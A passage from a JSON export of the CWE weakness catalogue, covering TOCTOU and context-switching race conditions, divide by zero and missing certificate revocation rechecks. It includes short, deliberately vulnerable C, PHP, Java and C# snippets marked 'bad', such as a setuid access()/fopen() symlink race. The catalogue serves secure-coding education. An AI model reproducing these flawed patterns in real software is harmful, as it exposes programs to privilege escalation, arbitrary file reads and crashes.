resources."},{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Modify Files or Directories","Modify Memory","Other"],"Note":"Race conditions such as this kind may be employed to gain read or write access to resources which are not normally readable or writable by the user in question."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"The resource in question, or other resources (through the corrupted one), may be changed in undesirable ways by a malicious user."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"If a file or other resource is written in this method, as opposed to in a valid way, logging of the activity may not occur."},{"Scope":["Non-Repudiation","Other"],"Impact":"Other","Note":"In some cases it may be possible to delete files a malicious user might not otherwise have access to, such as log files."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"The most basic advice for TOCTOU vulnerabilities is to not perform a check before the use. This does not resolve the underlying issue of the execution of a function on a resource whose state and identity cannot be assured, but it does help to limit the false sense of security given by the check."},{"Phase":"Implementation","Description":"When the file being altered is owned by the current user and group, set the effective gid and uid to that of the current user and group when executing this statement."},{"Phase":"Architecture and Design","Description":"Limit the interleaving of operations on files from multiple processes."},{"Phase":["Implementation","Architecture and Design"],"Description":"If you cannot perform operations atomically and you must share access to the resource between multiple processes or threads, then try to limit the amount of time (CPU cycles) between the check and use of the resource. This will not fix the problem, but it could make it more difficult for an attack to succeed."},{"Phase":"Implementation","Description":"Recheck the resource after the use call to verify that the action was taken appropriately."},{"Phase":"Architecture and Design","Description":"Ensure that some environmental locking mechanism can be used to protect resources effectively."},{"Phase":"Implementation","Description":"Ensure that locking occurs before the check, as opposed to afterwards, such that the resource, as checked, is the same as it is when in use."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code checks a file, then updates its contents.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct stat *sb;...lstat(\\"...\\",sb); // it has not been updated since the last time it was readprintf(\\"stated file\\\\n\\");if (sb-&gt;st_mtimespec==...){}","xhtml:br":["","","",""],"xhtml:div":{"#text":"print(\\"Now updating things\\\\n\\");updateThings();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"Potentially the file could have been updated between the time of the check and the lstat, especially since the printf has latency."},{"Intro_Text":"The following code is from a program installed setuid root. The program performs certain file operations on behalf of non-privileged users, and uses access checks to ensure that it does not use its root privileges to perform operations that should otherwise be unavailable the current user. The program uses the access() system call to check if the person running the program has permission to access the specified file before it opens the file and performs the necessary operations.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if(!access(file,W_OK)) {}else {}","xhtml:div":[{"#text":"f = fopen(file,\\"w+\\");operate(f);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"fprintf(stderr,\\"Unable to open file %s.\\\\n\\",file);","xhtml:br":""}}],"xhtml:br":""}},"Body_Text":"The call to access() behaves as expected, and returns 0 if the user running the program has the necessary permissions to write to the file, and -1 otherwise. However, because both access() and fopen() operate on filenames rather than on file handles, there is no guarantee that the file variable still refers to the same file on disk when it is passed to fopen() that it did when it was passed to access(). If an attacker replaces file after the call to access() with a symbolic link to a different file, the program will use its root privileges to operate on the file even if it is a file that the attacker would otherwise be unable to modify. By tricking the program into performing an operation that would otherwise be impermissible, the attacker has gained elevated privileges. This type of vulnerability is not limited to programs with root privileges. If the application is capable of performing any operation that the attacker would not otherwise be allowed perform, then it is a possible target."},{"attr":{"@_Demonstrative_Example_ID":"DX-49"},"Intro_Text":"This code prints the contents of a file if a user has permission.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function readFile($filename){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"$user = getCurrentUser();if(is_link($filename)){}if(fileowner($filename) == $user){}else{}","xhtml:br":["","","","","",""],"xhtml:i":"//resolve file if its a symbolic link","xhtml:div":[{"#text":"$filename = readlink($filename);","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo file_get_contents($realFile);return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"echo \'Access denied\';return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"This code attempts to resolve symbolic links before checking the file and printing its contents. However, an attacker may be able to change the file from a real file to a symbolic link between the calls to is_link() and file_get_contents(), allowing the reading of arbitrary files. Note that this code fails to log the attempted access (CWE-778)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0813","Description":"A multi-threaded race condition allows remote attackers to cause a denial of service (crash or reboot) by causing two threads to process the same RPC request, which causes one thread to use memory after it has been freed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0813"},{"Reference":"CVE-2004-0594","Description":"PHP flaw allows remote attackers to execute arbitrary code by aborting execution before the initialization of key data structures is complete.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0594"},{"Reference":"CVE-2008-2958","Description":"chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2958"},{"Reference":"CVE-2008-1570","Description":"chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1570"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Time-of-check Time-of-use race condition"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"File Access Race Conditions: TOCTOU"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Time of check, time of use race condition"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO01-C","Entry_Name":"Be careful using functions that use file names for identification"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP20","Entry_Name":"Race Condition Window"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"27"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-367"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 13: Race Conditions.&#34; Page 205"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;TOCTOU&#34;, Page 527"}}]},"Notes":{"Note":[{"#text":"TOCTOU issues do not always involve symlinks, and not every symlink issue is a TOCTOU problem.","attr":{"@_Type":"Relationship"}},{"#text":"Non-symlink TOCTOU issues are not reported frequently, but they are likely to occur in code that attempts to be secure.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Alternate_Terms, Observed_Examples, Other_Notes, References, Relationship_Notes, Relationships, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Alternate_Terms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Time-of-check Time-of-use Race Condition","attr":{"@_Date":"2008-10-14"}}}},"368":{"attr":{"@_ID":"368","@_Name":"Context Switching Race Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A product performs a series of non-atomic actions to switch between contexts that cross privilege or other security boundaries, but a race condition allows an attacker to modify or misrepresent the product\'s behavior during the switch.","Extended_Description":"This is commonly seen in web browser vulnerabilities in which the attacker can perform certain actions while the browser is transitioning from a trusted to an untrusted domain, or vice versa, and the browser performs the actions on one domain using the trust level and resources of the other domain.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"364","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary","Description":"This weakness can be primary to almost anything, depending on the context of the race condition."},{"Ordinality":"Resultant","Description":"This weakness can be resultant from insufficient compartmentalization (CWE-653), incorrect locking, improper initialization or shutdown, or a number of other weaknesses."}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":["Modify Application Data","Read Application Data"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-1837","Description":"Chain: race condition (CWE-362) from improper handling of a page transition in web client while an applet is loading (CWE-368) leads to use after free (CWE-416)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1837"},{"Reference":"CVE-2004-2260","Description":"Browser updates address bar as soon as user clicks on a link instead of when the page has loaded, allowing spoofing by redirecting to another page using onUnload method. ** this is one example of the role of \\"hooks\\" and context switches, and should be captured somehow - also a race condition of sorts **","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2260"},{"Reference":"CVE-2004-0191","Description":"XSS when web browser executes Javascript events in the context of a new page while it\'s being loaded, allowing interaction with previous page in different domain.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0191"},{"Reference":"CVE-2004-2491","Description":"Web browser fills in address bar of clicked-on link before page has been loaded, and doesn\'t update afterward.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2491"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Context Switching Race Condition"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 13: Race Conditions.&#34; Page 205"}}},"Notes":{"Note":[{"#text":"Can overlap signal handler race conditions.","attr":{"@_Type":"Relationship"}},{"#text":"Under-studied as a concept. Frequency unknown; few vulnerability reports give enough detail to know when a context switching race condition is a factor.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Relationship_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"369":{"attr":{"@_ID":"369","@_Name":"Divide By Zero","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product divides a value by zero.","Extended_Description":"This weakness typically occurs when an unexpected value is provided to the product, or if an error occurs that is not properly detected. It frequently occurs in calculations involving physical dimensions such as size, length, width, and height.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"A Divide by Zero results in a crash."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following Java example contains a function to compute an average but does not validate that the input value used as the denominator is not zero. This will create an exception for attempting to divide by zero. If this error is not handled by Java exception handling, unexpected results can occur.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public int computeAverageResponseTime (int totalTime, int numRequests) {}","xhtml:div":{"#text":"return totalTime / numRequests;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"public int computeAverageResponseTime (int totalTime, int numRequests) throws ArithmeticException {}","xhtml:div":{"#text":"if (numRequests == 0) {}return totalTime / numRequests;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.out.println(\\"Division by zero attempted!\\");throw ArithmeticException;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":""}}}],"Body_Text":"By validating the input value used as the denominator the following code will ensure that a divide by zero error will not cause unexpected results. The following Java code example will validate the input value, output an error message, and throw an exception."},{"Intro_Text":"The following C/C++ example contains a function that divides two numeric values without verifying that the input value used as the denominator is not zero. This will create an error for attempting to divide by zero, if this error is not caught by the error handling capabilities of the language, unexpected results can occur.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"double divide(double x, double y){}","xhtml:div":{"#text":"return x/y;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"const int DivideByZero = 10;double divide(double x, double y){}...try{}catch( int i ){}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"if ( 0 == y ){}return x/y;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"throw DivideByZero;","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""},{"#text":"divide(10, 0);","attr":{"@_style":"margin-left:10px;"}},{"#text":"if(i==DivideByZero) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"cerr&lt;&lt;\\"Divide by zero error\\";","attr":{"@_style":"margin-left:10px;"}}}]}}],"Body_Text":"By validating the input value used as the denominator the following code will ensure that a divide by zero error will not cause unexpected results. If the method is called and a zero is passed as the second argument a DivideByZero error will be thrown and should be caught by the calling block with an output message indicating the error.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-371"}}}},{"Intro_Text":"The following C# example contains a function that divides two numeric values without verifying that the input value used as the denominator is not zero. This will create an error for attempting to divide by zero, if this error is not caught by the error handling capabilities of the language, unexpected results can occur.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"int Division(int x, int y){}","xhtml:div":{"#text":"return (x / y);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"int SafeDivision(int x, int y){}","xhtml:div":{"#text":"try{}catch (System.DivideByZeroException dbz){}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"return (x / y);","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.Console.WriteLine(\\"Division by zero attempted!\\");return 0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}}],"Body_Text":"The method can be modified to raise, catch and handle the DivideByZeroException if the input value used as the denominator is zero.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-372"}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-3268","Description":"Invalid size value leads to divide by zero.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3268"},{"Reference":"CVE-2007-2723","Description":"\\"Empty\\" content triggers divide by zero.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2723"},{"Reference":"CVE-2007-2237","Description":"Height value of 0 triggers divide by zero.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2237"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FLP03-C","Entry_Name":"Detect and handle floating point errors"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT33-C","Entry_Name":"Ensure that division and remainder operations do not result in divide-by-zero errors","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"NUM02-J","Entry_Name":"Ensure that division and modulo operations do not result in divide-by-zero errors"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-04-11","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"370":{"attr":{"@_ID":"370","@_Name":"Missing Check for Certificate Revocation after Initial Check","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not check the revocation status of a certificate after its initial revocation check, which can cause the software to perform privileged actions even after the certificate is revoked at a later time.","Extended_Description":"If the revocation status of a certificate is not checked before each action that requires privileges, the system may be subject to a race condition. If a certificate is revoked after the initial check, all subsequent actions taken with the owner of the revoked certificate will lose all benefits guaranteed by the certificate. In fact, it is almost certain that the use of a revoked certificate indicates malicious activity.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"299","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"296","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"297","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"298","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Trust may be assigned to an entity who is not who it claims to be."},{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Data from an untrusted (and possibly malicious) source may be integrated."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Data may be disclosed to an entity impersonating a trusted entity, resulting in information disclosure."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Ensure that certificates are checked for revoked status before each use of a protected resource. If the certificate is checked before each access of a protected resource, the delay subject to a possible race condition becomes almost negligible and significantly reduces the risk associated with this issue."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code checks a certificate before performing an action.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=SSL_get_verify_result(ssl);if (X509_V_OK==foo)","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=SSL_get_verify_result(ssl);","xhtml:br":["","","",""],"xhtml:i":["//do stuff","//do more stuff without the check."]}}}}}},"Body_Text":"While the code performs the certificate verification before each action, it does not check the result of the verification after the initial attempt. The certificate may have been revoked in the time between the privileged actions."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Race condition in checking for certificate revocation"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP20","Entry_Name":"Race Condition Window"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 13: Race Conditions.&#34; Page 205"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Race Condition in Checking for Certificate Revocation","attr":{"@_Date":"2009-05-27"}}}},"372":{"attr":{"@_ID":"372","@_Name":"Incomplete Internal State Distinction","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly determine which state it is in, causing it to assume it is in state X when in fact it is in state Y, causing it to perform incorrect operations in a security-relevant manner.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incomplete Internal State Distinction"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"140"}},{"attr":{"@_CAPEC_ID":"74"}}]},"Notes":{"Note":[{"#text":"This conceptually overlaps other categories such as insufficient verification, but this entry refers to the product\'s incorrect perception of its own state.","attr":{"@_Type":"Relationship"}},{"#text":"This is probably resultant from other weaknesses such as unhandled error conditions, inability to handle out-of-order steps, multiple interpretation errors, etc.","attr":{"@_Type":"Relationship"}},{"#text":"This entry is being considered for deprecation.  It was poorly-defined in PLOVER and is not easily described using the behavior/resource/property model of vulnerability theory.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content 